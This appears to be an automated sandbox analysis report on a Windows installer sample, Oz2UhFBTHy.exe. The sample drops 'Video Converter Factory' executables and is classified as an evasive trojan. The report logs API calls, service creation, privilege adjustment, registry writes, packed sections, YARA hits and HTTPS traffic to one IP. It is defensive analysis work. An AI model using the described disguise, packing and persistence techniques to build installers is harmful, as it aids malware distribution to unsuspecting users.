                  Source: Oz2UhFBTHy.exe, 00000000.00000002.2625346135.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357693021.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357767019.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2626002203.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359995199.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359914020.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2624390518.0000000000807000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
                  Source: unknown | Network traffic detected: HTTP traffic on port 443, 30 client ports in the range 49837-50006: 49837, 49853, 49859, 49866, 49872, 49878, 49884, 49890, 49896, 49902, 49908, 49914, 49921, 49928, 49935, 49943, 49949, 49955, 49961, 49967, 49973, 49979, 49985, 49994, 50000, 50002, 50003, 50004, 50005, 50006 (client -> 443 seen for all 30; 443 -> client seen for all but 49866 and 49943)
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49837 version: TLS 1.2
Source: is-T8AR0.tmp.2.dr | Binary or memory string: DirectDrawCreateEx
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_0042F520 NtdllDefWindowProc_A,2_2_0042F520
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_00423B84 NtdllDefWindowProc_A,2_2_00423B84
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_004125D8 NtdllDefWindowProc_A,2_2_004125D8
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_00478AC0 NtdllDefWindowProc_A,2_2_00478AC0
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,2_2_00457594
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,2_2_0042E934
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
Source: Joe Sandbox View | Dropped File: C:\ProgramData\VideoConverterFactory\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: Oz2UhFBTHy.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Oz2UhFBTHy.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Oz2UhFBTHy.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-OIHIC.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-OIHIC.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-OIHIC.tmp.2.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: sqlite3.dll.3.dr | Static PE information: Number of sections : 19 > 10
Source: is-9MUD1.tmp.2.dr | Static PE information: Number of sections : 19 > 10
Source: Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename shfolder.dll~/ vs Oz2UhFBTHy.exe
Source: Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename shfolder.dll~/ vs Oz2UhFBTHy.exe
Source: Oz2UhFBTHy.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.evad.winEXE@5/30@0/3
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D2F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,3_2_02D2F8D0
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_00455E0C
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateServiceA,3_2_004016F8
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: CreateServiceA,3_2_0040D639
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_0046E0E4 GetVersion,CoCreateInstance,2_2_0046E0E4
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_0040D0BB StartServiceCtrlDispatcherA,3_2_0040D0BB
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | File created: C:\Users\user\AppData\Local\Programs
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | File created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp
Source: Yara match | File source: 3.0.videoconverterfactory.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.1372320071.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-LETAI.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: videoconverterfactory.exe, videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: videoconverterfactory.exe, videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: videoconverterfactory.exe, videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Oz2UhFBTHy.exe | ReversingLabs: Detection: 15%
Source: Oz2UhFBTHy.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: Oz2UhFBTHy.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | File read: C:\Users\user\Desktop\Oz2UhFBTHy.exe
Source: unknown | Process created: C:\Users\user\Desktop\Oz2UhFBTHy.exe "C:\Users\user\Desktop\Oz2UhFBTHy.exe"
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Process created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp "C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe"
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Process created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe "C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -i
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Converter Factory_is1Jump to behavior
                  Source: Oz2UhFBTHy.exeStatic file information: File size 3918263 > 1048576
                  Source: Binary string: msvcp71.pdbx# source: is-7N8CJ.tmp.2.dr
                  Source: Binary string: msvcr71.pdb< source: is-L1OQV.tmp.2.dr
                  Source: Binary string: msvcp71.pdb source: is-7N8CJ.tmp.2.dr
                  Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-T8AR0.tmp.2.dr
                  Source: Binary string: msvcr71.pdb source: is-L1OQV.tmp.2.dr

                  Data Obfuscation

Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Unpacked PE file: 3.2.videoconverterfactory.exe.400000.0.unpack _aett_6:ER;_aftt_6:R;_agtt_6:W;.rsrc:R;_ahtt_6:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Unpacked PE file: 3.2.videoconverterfactory.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004502C0
Source: initial sample -- Static PE information: section where entry point is pointing to: _aett_6
Source: videoconverterfactory.exe.2.dr -- Static PE information: section name: _aett_6
Source: videoconverterfactory.exe.2.dr -- Static PE information: section name: _aftt_6
Source: videoconverterfactory.exe.2.dr -- Static PE information: section name: _agtt_6
Source: videoconverterfactory.exe.2.dr -- Static PE information: section name: _ahtt_6
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /4
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /19
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /35
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /51
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /63
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /77
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /89
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /102
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /113
Source: is-9MUD1.tmp.2.dr -- Static PE information: section name: /124
Source: is-T8AR0.tmp.2.dr -- Static PE information: section name: Shared
Source: VideoConverterFactory.exe.3.dr -- Static PE information: section name: _aett_6
Source: VideoConverterFactory.exe.3.dr -- Static PE information: section name: _aftt_6
Source: VideoConverterFactory.exe.3.dr -- Static PE information: section name: _agtt_6
Source: VideoConverterFactory.exe.3.dr -- Static PE information: section name: _ahtt_6
Source: sqlite3.dll.3.dr -- Static PE information: section name: /4
Source: sqlite3.dll.3.dr -- Static PE information: section name: /19
Source: sqlite3.dll.3.dr -- Static PE information: section name: /35
Source: sqlite3.dll.3.dr -- Static PE information: section name: /51
Source: sqlite3.dll.3.dr -- Static PE information: section name: /63
Source: sqlite3.dll.3.dr -- Static PE information: section name: /77
Source: sqlite3.dll.3.dr -- Static PE information: section name: /89
Source: sqlite3.dll.3.dr -- Static PE information: section name: /102
Source: sqlite3.dll.3.dr -- Static PE information: section name: /113
Source: sqlite3.dll.3.dr -- Static PE information: section name: /124
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0040994C push 00409989h; ret 2_2_00409981
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00483F88 push 00484096h; ret 2_2_0048408E
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004062B4 push ecx; mov dword ptr [esp], eax 2_2_004062B5
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004104E0 push ecx; mov dword ptr [esp], edx 2_2_004104E5
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00412928 push 0041298Bh; ret 2_2_00412983
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00494CAC push ecx; mov dword ptr [esp], ecx 2_2_00494CB1
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0040CE38 push ecx; mov dword ptr [esp], edx 2_2_0040CE3A
